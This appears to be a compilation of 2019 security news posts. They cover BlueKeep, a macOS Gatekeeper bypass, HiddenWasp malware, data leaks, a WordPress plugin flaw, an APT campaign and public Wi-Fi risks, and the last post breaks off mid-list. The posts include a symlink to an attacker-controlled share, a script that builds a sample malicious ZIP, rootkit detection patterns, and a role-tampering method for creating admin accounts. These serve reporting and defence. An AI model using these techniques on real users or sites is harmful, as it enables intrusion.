The micropatch prevents a normal user from changing the permissions set on a system file through this path.


Pierluigi Paganini

(SecurityAffairs – micropatch, BearLPE)



Microsoft warns for the second time of applying BlueKeep patch

Microsoft issued a new warning for users to update their systems to address the remote code execution vulnerability dubbed BlueKeep.

Microsoft issued a new warning for users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with the May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw: malware authors could use it to build malicious code with WannaCry-like self-propagation.

As explained by Microsoft, the vulnerability can be exploited without user interaction, which is what makes it wormable and allows malware to spread uncontrolled across target networks.

Many security researchers have already developed their own exploit code for this issue without publicly disclosing it, for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Now Microsoft is warning companies again to patch older versions of Windows to prevent exploitation of the flaw. Security experts fear a new massive attack that could affect millions of still-unpatched computers worldwide.

The availability of exploit code in the wild poses a severe risk for users. Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, the founder of the zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that achieves remote code execution.

Other experts also announced that they have successfully developed exploits for BlueKeep, including Kaspersky, Check Point, and MalwareTech.

Recently, the popular expert Robert Graham scanned the Internet for vulnerable systems. He discovered more than 923,000 potentially vulnerable devices using the masscan port scanner and a modified version of rdpscan.

“Microsoft is confident that an exploit exists for this vulnerability, and if recent reports are accurate, nearly one million computers connected directly to the internet are still vulnerable to CVE-2019-0708. Many more within corporate networks may also be vulnerable. It only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise.” reads the advisory published by Simon Pope, Director of Incident Response, Microsoft Security Response Center (MSRC). “This scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.”

Even if there has been no sign of attacks exploiting the flaw in the wild, Microsoft recommends updating the vulnerable Windows versions as soon as possible.

“It’s been only two weeks since the fix was released and there has been no sign of a worm yet. This does not mean that we’re out of the woods. If we look at the events leading up to the start of the WannaCry attacks, they serve to inform the risks of not applying fixes for this vulnerability in a timely manner.” concludes the advisory.

“Our recommendation remains the same. We strongly advise that all affected systems should be updated as soon as possible.”

Microsoft also pointed out that workstations not directly connected to the Internet are exposed too, since a single compromised Internet-facing host can be used as a gateway to reach them.




Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)


Security expert shows how to bypass macOS Gatekeeper

A security researcher demonstrated how to bypass the Apple macOS Gatekeeper by leveraging trust in network shares.

The Italian security researcher Filippo Cavallarin demonstrated how to bypass the macOS Gatekeeper by leveraging trust in network shares.

Apple’s Gatekeeper is designed to protect macOS users by performing a number of checks before allowing an app to run: by default, it blocks the execution of apps that were not downloaded from the Mac App Store or signed by an identified developer.

Filippo Cavallarin demonstrated how to bypass Gatekeeper and execute untrusted code without user explicit permission and any warning to the victims.

Gatekeeper considers both external drives and network shares as safe locations, this means that any application in these locations could run without asking for the user’s consent.

The attack chains two legitimate macOS features, automount (aka autofs) and symbolic links inside ZIP archives, with the lack of specific checks on the latter.

“As per-design, Gatekeeper considers both external drives and network shares as safe locations and it allows any application they contain to run.” wrote the expert.”By combining this design with two legitimate features of MacOS X, it will result in the complete deceivement of the intended behaviour.” 

The autofs feature allows a user to automatically mount a network share by accessing a “special” path, in this specific case any path beginning with “/net/” (i.e. /net/evil-attacker.com/sharedfolder/).

The second feature is the ability to include in a ZIP archive symbolic links pointing to arbitrary locations, in this case automount endpoints.

Cavallarin discovered that the software responsible for decompressing the ZIP archives does not perform any check on the symlinks.

An attacker can create a ZIP file containing a symbolic link to an automount endpoint under their control and send it to the victim. When the victim extracts the archive and follows the symlink, they land in a location that is controlled by the attacker and trusted by Gatekeeper.

“To better understand how this exploit works, let’s consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/evil.com/Documents) and sends it to the victim. The victim downloads the malicious archive, extracts it and follows the symlink.” continues the expert.

“Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this technique very effective and hard to spot.”
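The dangerous component in the scenario above is not the archive’s contents but a symlink entry whose target resolves under /net/. The Python script below, added here as an example and not code from the researcher, shows how to inspect an archive for such entries before it is handed to the system extractor: the ZIP format keeps the Unix mode bits in the high 16 bits of each entry’s external_attr, and a symlink entry stores its target as the entry data. The two sample archives (one with a Documents link to /net/evil.example/Documents, one with a harmless relative link) are constructed in memory for the example; evil.example is a placeholder host.

```python
import io
import stat
import zipfile


def symlinks_in(zip_bytes):
    """(name, target) for every entry stored as a Unix symlink."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if stat.S_ISLNK(info.external_attr >> 16):
                found.append((info.filename, zf.read(info).decode("utf-8", "replace")))
    return found


def link_risk(target):
    """Why a link target is unsafe to follow after extraction, or None."""
    parts = target.split("/")
    if target == "/net" or target.startswith("/net/"):
        return "automount"          # /net/<host>/<share>: autofs mounts an attacker-controlled share
    if target.startswith("/") or ".." in parts:
        return "escapes-archive"    # absolute or parent-relative: points outside the extraction folder
    return None


def audit_archive(zip_bytes):
    """(name, target, reason) for each symlink that should not be followed."""
    findings = []
    for name, target in symlinks_in(zip_bytes):
        reason = link_risk(target)
        if reason:
            findings.append((name, target, reason))
    return findings


def build_archive(entries):
    """Construct a ZIP in memory. entries: (name, data, link_target); when link_target
    is set the entry is written as a symlink, as 'zip -y' would store it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data, link_target in entries:
            zi = zipfile.ZipInfo(name)
            zi.create_system = 3                                 # Unix, so mode bits are meaningful
            if link_target is not None:
                zi.external_attr = (stat.S_IFLNK | 0o777) << 16
                zf.writestr(zi, link_target)
            else:
                zi.external_attr = (stat.S_IFREG | 0o644) << 16
                zf.writestr(zi, data)
    return buf.getvalue()


# Constructed samples; evil.example is a placeholder, not a host from the research.
MALICIOUS_ZIP = build_archive([
    ("README.txt", b"Your documents are in the Documents folder.", None),
    ("Documents", None, "/net/evil.example/Documents"),
])
BENIGN_ZIP = build_archive([
    ("report-2019-05.pdf", b"%PDF-1.4 ...", None),
    ("latest.pdf", None, "report-2019-05.pdf"),
])

if __name__ == "__main__":
    print("malicious:", audit_archive(MALICIOUS_ZIP))
    print("benign:", audit_archive(BENIGN_ZIP))
```

Note that Python’s own zipfile.extractall does not recreate symlinks (it writes the target string out as an ordinary file), so the check above is meant to run on the archive before a native extractor such as the macOS Archive Utility, which does create them, touches it.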

The researcher also published a video PoC of the attack.

As a workaround, the expert suggests disabling the automount feature with the following procedure:

  1. Edit /etc/auto_master as root
  2. Comment the line beginning with ‘/net’
  3. Reboot

Cavallarin reported his findings to Apple on February 22, 2019. A fix was expected on May 15, 2019, but Apple stopped answering his emails, so the researcher disclosed the issue once his 90-day deadline expired.

“The vendor has been contacted on February 22th 2019 and it’s aware of this issue.” concludes the researcher. “This issue was supposed to be addressed, according to the vendor, on May 15th 2019 but Apple started dropping my emails. Since Apple is aware of my 90 days disclosure deadline, I make this information public. ”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Gatekeeper, hacking)

The post Security expert shows how to bypass macOS Gatekeeper appeared first on Security Affairs.

HiddenWasp, a sophisticated Linux malware borrows from Mirai and Azazel

Security experts at Intezer have discovered a new Linux malware tracked as ‘HiddenWasp’ that borrows from the Mirai and Azazel malicious codes.

HiddenWasp is a new sophisticated Linux malware still undetected by the majority of anti-virus solutions. According to the experts at Intezer, the malware was involved in targeted attacks.  

“Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control.” reads the analysis published by Intezer.

“Evidence shows in high probability that the malware is used in targeted attacks for victims who are already under the attacker’s control, or have gone through a heavy reconnaissance.”

Researchers from Intezer said that most of HiddenWasp’s code is unique; however, the authors borrowed chunks of code from publicly available open-source malware, such as Mirai and the Azazel rootkit.

Like the Linux variant of the Winnti backdoor recently documented by Chronicle, HiddenWasp is composed of a user-mode rootkit, a Trojan, and a script for the initial deployment. 

The script allows the malware to achieve persistence: it creates a new system user account and updates older variants if the system was already compromised. Then the script downloads a tar archive that contains the rootkit, the Trojan, and the initial deployment script.

“The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system. This tarball will contain all of the components from the malware, containing the rootkit, the trojan and an initial deployment script,” continue the experts.

Once the malware components are installed, the main Trojan binary is executed and the rootkit is added to the LD_PRELOAD mechanism. The malicious code also sets up various environment variables, and the script attempts to gain persistence by adding the trojan to /etc/rc.local.

“It seems that this actor changed the default environment variable from Azazel, that one being HIDE_THIS_SHELL for I_AM_HIDDEN.” continue the experts. “We have based this conclusion on the fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest of the components of the malware and it seems to be residual remains from Azazel original code.”
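To make the persistence mechanisms just described concrete from the defender’s side, here is an added Python check (not Intezer’s code; it uses constructed rc.local and ld.so.preload samples with placeholder library paths rather than indicators from the report) that flags LD_PRELOAD exports, the I_AM_HIDDEN and HIDE_THIS_SHELL trigger variables, and preload libraries missing from an allow list.

```python
import re

# Constructed sample files (not real HiddenWasp artifacts): an rc.local that an
# installer script has appended to, and a one-line /etc/ld.so.preload.
# "/lib/libplaceholder.so" is a placeholder path, not an indicator from the report.
SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
# rc.local
/usr/sbin/some-legit-daemon --quiet
export I_AM_HIDDEN=1
export LD_PRELOAD=/lib/libplaceholder.so    # placeholder path
exit 0
"""

SAMPLE_LD_SO_PRELOAD = """\
/lib/libplaceholder.so
"""

# Environment variables the report ties to HiddenWasp (I_AM_HIDDEN) and to the
# Azazel rootkit it borrows from (HIDE_THIS_SHELL).
SUSPICIOUS_ENV_VARS = {"I_AM_HIDDEN", "HIDE_THIS_SHELL"}

# Matches "NAME=value" or "export NAME=value" at the start of a shell line.
ASSIGNMENT_RE = re.compile(r"(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*)")


def preload_findings(rc_local_text: str, ld_so_preload_text: str,
                     known_libs=frozenset()) -> list:
    """Return (source, detail) findings for LD_PRELOAD-style persistence.

    Flags LD_PRELOAD exports and rootkit trigger variables set from rc.local,
    plus any /etc/ld.so.preload library that is not on the known-good list.
    """
    findings = []
    for n, line in enumerate(rc_local_text.splitlines(), 1):
        stripped = line.split("#", 1)[0].strip()   # drop trailing comments
        if not stripped:
            continue
        m = ASSIGNMENT_RE.match(stripped)
        if not m:
            continue
        name, value = m.group(1), m.group(2).strip()
        if name == "LD_PRELOAD":
            findings.append(("rc.local", f"line {n}: LD_PRELOAD set to {value}"))
        elif name in SUSPICIOUS_ENV_VARS:
            findings.append(("rc.local", f"line {n}: rootkit trigger variable {name}"))
    for n, line in enumerate(ld_so_preload_text.splitlines(), 1):
        lib = line.strip()
        if lib and lib not in known_libs:
            findings.append(("ld.so.preload", f"line {n}: unexpected preload {lib}"))
    return findings


if __name__ == "__main__":
    for source, detail in preload_findings(SAMPLE_RC_LOCAL, SAMPLE_LD_SO_PRELOAD):
        print(f"[{source}] {detail}")
```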

Researchers also found that the HiddenWasp’s rootkit uses an algorithm similar to the one used by the infamous Mirai.

The rootkit is a user-space rootkit enforced via the LD_PRELOAD mechanism and delivered in the form of an ET_DYN stripped ELF binary.

Experts linked the Trojan component with ChinaZ’s Elknot malware and other ChinaZ implants, a circumstance that suggests the author of HiddenWasp may have integrated modified versions of the Elknot malware that could have been shared on Chinese hacking forums.

Some artifacts found by the experts also belong to the Chinese open-source Linux rootkit Adore-ng, likely because systems targeted with HiddenWasp might have been previously compromised with this open-source rootkit.

“Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake up call for the security industry to allocate greater efforts or resources to detect these threats.” concludes the report.

“Linux malware will continue to become more complex over time and currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility.”


Pierluigi Paganini

(SecurityAffairs – HiddenWasp, Linux malware)


The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains

vpnMentor researchers have recently discovered that hotel brands managed by The Pyramid Hotel Group have suffered a data leak.

vpnMentor experts have discovered that hotel brands managed by The Pyramid Hotel Group, including Marriott, have suffered a data leak.

vpnMentor’s research team discovered the unprotected server through port scanning to examine known IP blocks.

Researchers discovered 85.4GB of security audit logs, the exposed data also include monitoring and alerts, reported system errors, misconfiguration, policy violations, potential attempted malicious breaches, and other cybersecurity events. Unsecured data also include personally identifying information (PII) of employees.

The exposed data dates back to April 19, 2019, likely the date of the system setup or reconfiguration that is the root cause of the leak.

The unsecured server exposed audit logs generated by Wazuh, an open-source intrusion detection system used by the company.

“The Pyramid Hotel Group utilizes Wazuh – an open source intrusion detection system – on an unsecured server that is leaking information regarding their operating systems, security policies, internal networks, and application logs.” reads the post published by vpnMentor.


The Pyramid Hotel Group manages hospitality and resort properties in the US, Hawaii, the Caribbean, Ireland, and the UK; its portfolio includes locations of several brands such as Marriott, Sheraton, Plaza, Hilton Hotel and other independent hotels.

Data leaked by the company could be used by attackers to gather information about hotels’ network and security measures implemented to protect them. This information could be used by hackers in later attacks.

Below the timeline of discovery:

DATE     EVENT
5/27/19  Breach discovered by vpnMentor Research team
5/28/19  Informed PHG of breach
5/28/19  Received acknowledgement from PHG
5/29/19  Data leak closed. Problem resolved.

Recently vpnMentor experts discovered an unprotected database impacting up to 65% of US households.

Pierluigi Paganini

(SecurityAffairs – Pyramid Hotel Group, data leak)


Checkers double drive-thru restaurants chain discloses card breach

Checkers and Rally’s, one of the largest chains of double drive-thru restaurants in the United States, disclosed a credit card breach.

“We recently became aware of a data security issue involving malware at certain Checkers and Rally’s locations.” reads a breach notice published by the company. “After discovering the issue, we quickly engaged leading data security experts to conduct an extensive investigation and coordinated with affected restaurants and federal law enforcement authorities to address the matter.”

According to the security notice, crooks breached the systems of the company and planted a PoS malware in its payments processing system allowing an unauthorized party to siphon payment card data of some guests. The malware only infected the point-of-sale systems at some Checkers and Rally’s locations.

“The malware was designed to collect information stored on the magnetic stripe of payment cards, including cardholder name, payment card number, card verification code and expiration date.” continues the notice. “Based on the investigation, we have no evidence that other cardholder personal information was affected by this issue.”

The company provided a list of the affected locations and the estimated windows of exposure during which the PoS malware was used to steal the guests’ card data.

102 restaurants have been impacted, roughly 15% of all of the locations.

Most of the impacted locations were infected with the PoS malware between early 2018 and 2019; the list also includes some locations compromised back in 2017, and one infection dates back to September 2016.

Checkers declared that the malicious code was completely removed from the payment systems in April 2019.

The company reported the card breach to the authorities and hired third-party security experts to contain and remove the malware.

“After identifying the incident, we promptly launched an extensive investigation and took steps to contain the issue. We also are working with federal law enforcement authorities and coordinating with the payment card companies in their efforts to protect cardholders,” reads the Checkers notice. “We encourage you to review your account statements and contact your financial institution or card issuer immediately if you identify an unauthorized charge on your card. The payment card brands’ policies provide that cardholders have zero liability for unauthorized charges that are reported in a timely manner.”

The company encourages potentially affected guests to review their account statements and contact their financial institution or card issuer immediately if they identify an unauthorized charge on their card.

Clients are entitled under U.S. law to one free credit report annually from each of the three nationwide consumer reporting agencies. 

Pierluigi Paganini

(SecurityAffairs – Checkers, card breach)


Convert Plus WordPress plugin flaw allows hackers to create Admin accounts

The WordPress plugin Convert Plus is affected by a critical flaw that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.

The WordPress plugin Convert Plus is affected by a critical vulnerability that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.


The vulnerability stems from the lack of filtering when processing a new user subscription via a form implemented by the Convert Plus plugin, which has more than 100,000 active installations.

Convert Plus aims at generating more subscribers and sales conversions using popups, header & footer bars, slide-in forms, sidebar widgets, in-line forms, and social buttons.

New subscribers can use a specific form that allows them to define the role they want; of course, administrator accounts are not among the options offered in the drop-down menu.

Experts at Defiant discovered that the Convert Plus plugin reflects the intended role for new users in a hidden field called “cp_set_user.” Experts pointed out that the value for this field is supplied by the same HTTP request as the rest of the subscription entry, so users can modify it.

“However, in vulnerable versions of the plugin, this intended user role wasn’t fetched from the database on submission. Instead, this setting was reflected in a hidden field on the plugin’s forms called cp_set_user.” reads the analysis by the experts. “Because this value is supplied by the same HTTP request as the rest of the subscription entry, it can be modified by the user.”

It is very easy for an attacker to submit a subscription form and set the value of “cp_set_user” to “administrator” to create a new admin user.

“This code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed.” continues the analysis.

“Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address.”

The attack creates a new admin account with a randomized password, but that is not a problem for the attacker, who can use the classic password reset procedure to change the password.

The vulnerability affects all versions of the Convert Plus plugin up to 3.4.2; it is essential for administrators to update their installations to version 3.4.3.

Defiant experts also published a video PoC for the exploitation of the issue.

Below is the disclosure timeline of the vulnerability:

  • May 24 – Vulnerability discovered. Notified developers privately.
  • May 28 – Patch released by developers. Firewall rule released for Premium users.
  • June 27 – Planned date for firewall rule’s release to Free users.



Pierluigi Paganini

(SecurityAffairs – Convert Plus plugin, hacking)


VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs

Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

Recent research by the cybersecurity experts at VPNpro shows that the popular mobile VPN developer Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

The study also revealed that two of those VPN products are under its other developer name, Lemon Clove, and another two by Autumn Breeze 2018.

Interestingly, most of the popular mobile-only VPNs that VPNpro analyzed are actually Chinese (run by Chinese nationals or actually located in China). Any data that is held in mainland China is wide open to access by Chinese authorities, confirming US Senators’ recent fears of American data falling into Chinese or Russian hands.

Innovative Connecting VPN products

Innovative Connecting owns the following 10 VPN products:

  1. VPN Master – Free Proxy
  2. VPN Proxy Master (Pro)
  3. VPN Proxy Master (Lite)
  4. Turbo VPN
  5. Unlimited Free VPN
  6. HOT VPN
  7. Snap VPN
  8. VPN Robot
  9. VPN Sofast
  10. Turbo VPN Private Browser

Source: VPNpro

What is the relationship between Innovative Connecting, Lemon Clove and ALL Connected?

VPNpro’s research reveals that there is a clear relationship between these three companies. Innovative Connecting has more than a strong business relationship with Lemon Clove, which creates the popular Snap VPN and VPN Robot apps.

Lemon Clove and Innovative Connecting share the same secretary, Loo Ping Yoo, and key addresses. Both Lemon Clove’s website and Innovative Connecting’s website are the same, with only small changes in text.

If you search for VPN Proxy Master on Apple’s App Store, you can see the developer name appears as ALL Connected, while Innovative Connecting is listed as the developer on Google Play.

ALL Connected’s Turbo and Master VPN are on similar Cloudfront domains that link to Innovative Connecting. The App Store policy for VPN Master (developed by Innovative Connecting) is hosted on ALL Connected’s domain. All the policies for these VPN apps have the exact same broken English and typos.

Innovative Connecting’s Director seems to be Danny Chen, the well-known Chinese entrepreneur and CEO behind Linksure. Beyond that, the researchers discovered that the email address used to register turbovpn.co (developed by Innovative Connecting) also registered lemonclove.net, vpnsnap.com, and many others.


Source: VPNpro

Why does it matter if a company owns multiple VPN products?

There is nothing wrong with owning multiple VPN brands – but there must be transparency between the company and its users. Trust is the most important factor for most users of VPN services. Other than this, there are two further crucial issues:

1. Privacy

In a recent US survey, 95% of internet users said they were either somewhat concerned or very concerned about their privacy. However, if VPNs are actually located in a 5/9/14 Eyes country, which are normally high-surveillance countries, or in a repressive country like China or Russia, users’ data is most likely already in those governments’ hands.

2. Security

If a VPN’s parent company is untrustworthy, including having weak security or actively engaged in malicious activities, it can be a big problem. This can lead to users’ data being stolen and sold on the black market, or even having their computers hacked into.

Bottom line

There are thousands of VPN companies out there, and unfortunately many of them have weak security and privacy features, or are outright malicious in wanting to steal or sell user data.

To help you find a trustworthy VPN, you should follow these steps below:

  • carefully read the privacy policy of a VPN provider
  • read in-depth reviews of a VPN company on different platforms
  • ask for recommendations in different communities and see their views
  • check if the company is GDPR compliant
  • read their privacy features
  • check if they have had any scandals or breaches

With the right homework, you can find a trustworthy VPN that actually helps safeguard your online activity.


About The Author: Susan Alexandra is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor in cryptocurrencies. Susan’s inbox is open for new ideas and stories; you can share story ideas at susanalexandra67(at)gmail(dot)com


Pierluigi Paganini

(SecurityAffairs – VPNs, privacy)


Emissary Panda APT group hit Government Organizations in the Middle East

Chinese Cyber-Spies Target Government Organizations in Middle East

Chinese APT group Emissary Panda has been targeting government organizations in two different countries in the Middle East.

Experts at Palo Alto Networks reported that the Chinese APT group Emissary Panda (aka APT27, TG-3390, Bronze Union, and Lucky Mouse) has been targeting government organizations in two different countries in the Middle East.

The Emissary Panda APT group has been active since 2010 and has targeted organizations worldwide, including U.S. defense contractors, financial services firms, and a national data center in Central Asia.


The group was involved in cyber espionage campaigns aimed at new generation weapons and in surveillance activities on dissidents and other civilian groups. 

The cyber espionage group leverages both readily available tools and custom malware in its operations; many of these tools have been available for years, but in recent attacks their code was updated.

In April 2019, the group targeted organizations in two different countries in the Middle East. The hackers hit web servers to install webshells on SharePoint servers, leveraging the CVE-2019-0604 vulnerability to compromise them.

Once the network is compromised, the attackers upload a variety of tools to perform additional activities, including dumping credentials, and locating and pivoting to additional systems on the network.

Experts pointed out that attackers used tools to scan the network for systems vulnerable to CVE-2017-0144, the flaw exploited by the NSA-linked EternalBlue exploit.

The campaign appears related to attacks exploiting CVE-2019-0604 reported by the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security. The report by the Saudi Cyber Security Centre suggests threat actors are primarily targeting organizations within the kingdom. The Canadian Cyber Security Centre reported similar attacks aimed at delivering the China Chopper web-shell to ensure persistence in the target networks.

“The actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks. We also found the China Chopper webshell on the SharePoint servers, which has also been used by the Emissary Panda threat group.” states the report published by Palo Alto Networks.

Between April 1 and April 16, Palo Alto experts observed the threat actors using webshells to upload 24 unique executables on three SharePoint servers hosted by two different government organizations. Experts noticed that the same tools were uploaded across the three webshells, suggesting the involvement of the same attacker.

The longest activity involving one of the three webshells was observed on April 16, 2019.

The list of the tools uploaded by cyberspies included legitimate applications such as cURL, post-exploitation tools like Mimikatz, tools to scan for and exploit potential vulnerabilities in the target network, and custom backdoors such as HyperBro, which was used by Emissary Panda in the past. 

One of the webshells used by the attackers is a variant of the Antak webshell, other webshells appear related to the China Chopper webshell.

“We were able to gather one of the webshells with which we saw the actor interacting, specifically the error2.aspx file listed above. The error2.aspx file (SHA256: 006569f0a7e501e58fe15a4323eedc08f9865239131b28dc5f95f750b4767b38) is a variant of the Antak webshell, which is part of a tool created for red teaming called Nishang. ” continues the report.

The researchers also uncovered the use of additional sideloaded DLLs in this campaign.

“The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East, which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604,” Palo Alto Networks concludes. 

“Once the adversary established a foothold on the targeted network, they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials, perform network reconnaissance and pivot to other systems.  “

Pierluigi Paganini

(SecurityAffairs – cyberespionage, Emissary Panda)


Google white hat hacker found code execution flaw in Notepad

The popular white hat hacker Tavis Ormandy has announced the discovery of a code execution vulnerability in Microsoft’s Notepad text editor.

The Google Project Zero researcher Tavis Ormandy announced the discovery of a code execution flaw in Microsoft’s Notepad text editor.

Ormandy reported the issue to Microsoft and will wait 90 days, according to Google’s vulnerability disclosure policy, before revealing technical details of the flaw.

Of course, Ormandy could also disclose the details of the vulnerability once Microsoft releases a security patch to address the issue.

Ormandy anticipated that the vulnerability is a memory corruption bug, and he shared via Twitter an image that demonstrates how he managed to “pop a shell in Notepad.”

The image posted by Ormandy shows that the vulnerability has been exploited to launch a Command Prompt, the expert confirmed he has already developed a “real exploit” for the issue.


A message published by Chaouki Bekrar, founder of the zero-day broker Zerodium, confirms that the type of issue found by the Google white hat hacker is not uncommon. The real surprise, according to Bekrar, is finding an expert who reports it to Microsoft instead of exploiting it or attempting to sell it.

Stay tuned …

Pierluigi Paganini

(SecurityAffairs – Notepad, hacking)


Using Public Wi-Fi? Your data can be hacked easily! Here’s How…

Public Wi-Fi is easily accessible by everyone, as much as free surfing sounds cool, it is risky as well. Let’s see how your data can be hacked easily.

In the contemporary world of networking, Wi-Fi has become a vital commodity. Wi-Fi is now installed in each and every place regardless of its size; from international airports to small kiosks, you can find an internet connection everywhere. Most of these Wi-Fi networks are not operating on an individual level but are open to all. Public Wi-Fi is easily accessible by everyone, be it customers of the shop or just travelers passing by, and it is completely free. This means you can connect to the network and enjoy surfing without paying a single dime.

Threats of Public Wi-Fi

Public Wi-Fi attracts millions of users each year. According to a survey, three out of four people connect to public Wi-Fi at some point or place, without giving it a second thought. As much as free surfing sounds cool, it is risky as well. There are multiple threats associated with public Wi-Fi because it is an open network that can be accessed by anyone, and that includes cybercriminals. Some common threats associated with public Wi-Fi are listed here to warn users how insecure it can be:

  • Hackers and Predators

Public Wi-Fi and hotspots are the favorite hubs of hackers and predators. With public Wi-Fi, all the data that you send and receive is open for anyone to peek in. This data may include your personal and secretive details like emails, social media accounts, passwords, bank details, and other crucial stuff. The hackers act as the middle man between you and your designated sites and record essential details of your accounts. These details can be later used for any unauthorized or illegal purpose.

  • Device Hijacking

Hackers and other cybercriminals are smarter than you think. They not only keep an eye on your online activities but also look for ways to invade your device. If the file sharing option of your device is turned on, you are likely to receive various “system upgrade” files to run. When you are on a public Wi-Fi, these files are often malware, a kind of virus that hijacks your device and allows cybercriminals to access all the offline data saved on your device.

  • Malicious Networks

When you are out in the streets or in public places, there are various public Wi-Fi networks reaching your device. Some of these networks are secured with a password while others are just open to all. The open public Wi-Fi is an actual threat, as it can be created by bad guys with wrong intentions. When your device is connected to a suspicious network, the hackers get hold of your device. They can not only peek into your device but can also use it for any illegal purpose. You will not even get any notification of activities carried out through your device and will remain unaware.

  • Cookie Theft

Cookie theft is one of the major risks of using unencrypted sites. The sites that do not have SSL (Secure Sockets Layer) connection are quite vulnerable and cookies from these sites can be accessed easily by anyone. The risk of using these sites increases to a greater extent when you are on a public Wi-Fi as it provides zero protection against data theft.

  • Spying and Snooping

Spying and keeping track of any user’s activity becomes a lot easier with public Wi-Fi. There are small hardware devices, known as packet sniffers or packet analyzers, that are often installed by service providers to monitor the traffic on the network. But setting up these devices is very easy and can be done by anyone, making the task of spies and detectives easier. Data obtained from these devices reveals the statistics of all your online activities carried out through the network and can put you in danger.

  • Propagating of Viruses

Public Wi-Fi often serves as a medium for propagating viruses. There are advanced viruses, known as computer worms, that propagate really fast through any network. Unlike classical computer viruses that require a particular program to run, these worms can infect any device that is on the same network as the affected one. Since on public Wi-Fi a large number of people are simultaneously connected to the same network, there is a very high chance of your device becoming a victim.


Tips to Stay Safe on Public Wi-Fi

Staying safe on the internet is not an easy task, and this task becomes more challenging while you are using public Wi-Fi. Free Wi-Fi has its own temptations, and in some instances it becomes unavoidable to benefit from it. Though public Wi-Fi can never be completely secure, there are a few tips that will assist you in making your online presence less vulnerable.

  • Enable Wi-Fi Only When Needed

Always keep your device’s Wi-Fi turned off when you are in public places and enable it only when needed. This may seem like an unnecessary hassle for frequent internet users, but it is a mandatory thing to do while in public. If your device’s Wi-Fi is turned on, it can catch signals from all the available Wi-Fi networks in your surroundings and will automatically connect to any open public Wi-Fi. Your device is at constant risk of connecting with malicious networks and getting infected by worms when its Wi-Fi is active all the time.

  • Never Connect with Unknown Wi-Fi

Password-protected public Wi-Fi is a bit safer than open public Wi-Fi and is the better option. When a Wi-Fi network is protected by a password, it ensures that only authorized people can access the network and reduces the chances of having hackers on the same network. But if you really need to connect to an open public Wi-Fi, always confirm the name of the network with the relevant people around. Rogue Wi-Fi hotspots usually use names similar to the actual business Wi-Fi, and you can easily fall prey to them if you are not cautious.

  • Browse Safely

You must always be cautious while browsing any site on the internet, as it is a world full of scams and cons. The risk multiplies when you are using public Wi-Fi to access an unauthorized site. All sites that are authorized and provide data encryption begin with HTTPS. These sites have an SSL connection and are marked by a lock sign in the address bar. Sites without an SSL connection do not take any responsibility for data shared through them, which is definitely a risk factor, and this threat increases if your Wi-Fi connection is unsafe too.

  • Be Vigilant While Sharing Information

When you are on public Wi-Fi, all the data transactions to and from your device are vulnerable to spying and snooping. Be vigilant about what you share while on public Wi-Fi and never carry out any important transaction through open networks. Remember that your bank details and crucial business documents should not be put at risk through mere negligence.

Also, limit your social media surfing through public hotspots, as it paves the way for predators to reach your personal information. Logging in through a public network also gives cybercriminals easier access to your account details and passwords and makes your accounts vulnerable to hacking. To stay safe, log in to your accounts only if needed and sign out as soon as your task is done.

  • Opt for VPN

A VPN (Virtual Private Network) is one of the strongest protections you can add when using public Wi-Fi. It routes your traffic through an encrypted tunnel to the provider's server, which is usually in a different location from you, so the sites you visit see the VPN server's address rather than yours and your real location stays hidden from predators and spies.

Because everything inside the tunnel is encrypted, nobody on the local network, including the hotspot operator or a rogue access point, can read or tamper with your transactions between your device and the VPN server. The protection ends at that server: the VPN provider itself can see your traffic, so pick a provider you trust.

A VPN protects the path, not the endpoint: it does not stop malware from reaching your device, so it complements rather than replaces the device protections below. Though it is usually a paid service, it is worth investing in.

  • Secure Your Device

